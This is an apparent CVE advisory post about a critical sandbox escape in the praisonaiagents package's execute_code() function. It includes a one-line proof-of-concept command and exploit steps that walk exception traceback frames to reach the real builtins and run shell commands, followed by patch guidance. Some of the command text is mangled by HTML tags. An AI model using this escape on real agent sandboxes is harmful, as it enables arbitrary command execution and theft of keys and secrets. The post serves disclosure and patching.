Listen to this Post
How this CVE works:
The `execute_code()` function defaults to sandbox_mode="sandbox", running user code in a subprocess with a restricted `__builtins__` dict and an AST-based blocklist. The subprocess wrapper’s `blocked_attrs` contains only 11 attribute names, missing key frame‑traversal attributes (__traceback__, tb_frame, f_back, f_builtins). By raising an exception, an attacker can chain `e.__traceback__.tb_frame.f_back.f_builtins` to reach the real `builtins` dictionary. From there, they retrieve `exec` and execute arbitrary commands, bypassing all sandbox layers. The AST blocklist does not block dot‑notation access, and `_safe_getattr` only intercepts explicit `getattr()` calls. The subprocess mode lacks the text‑pattern blocklist present in direct mode, making the escape trivial.
DailyCVE form:
Platform: praisonaiagents
Version: ≤1.5.113
Vulnerability: Sandbox escape
Severity: Critical (9.9)
date: 2026-04-08
Prediction: Already patched (1.5.115)
What Undercode Say:
Check installed version
pip show praisonaiagents
Reproduce the escape
python -c "from praisonaiagents.tools.python_tools import execute_code; print(execute_code('try: 1/0\nexcept Exception as e: exec(e.<strong>traceback</strong>.tb_frame.f_back.f_builtins[\"exec\"](\"import os; os.system('id')\"))'))"
Verify fix (≥1.5.115)
pip install praisonaiagents>=1.5.115
Exploit:
- Submit code that raises an exception (e.g.,
1/0). - Use `__traceback__` → `tb_frame` → `f_back` →
f_builtins.
3. Retrieve `exec` as `_x = _p.f_builtins[“exec”]`.
- Execute arbitrary shell commands with
_x("import subprocess; subprocess.check_output('id', shell=True)").
Protection from this CVE:
- Upgrade to
praisonaiagents ≥ 1.5.115. - Merge the full attribute blocklist (30+ entries) into the subprocess wrapper.
- Add AST rules to block any attribute name starting with
_. - Apply the text‑pattern blocklist to subprocess mode.
- Avoid exposing `execute_code()` to untrusted input.
Impact:
Full host compromise: arbitrary command execution, file read/write (source, .env, SSH keys), environment variable exfiltration (API keys, secrets), and lateral movement via the host’s network stack.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

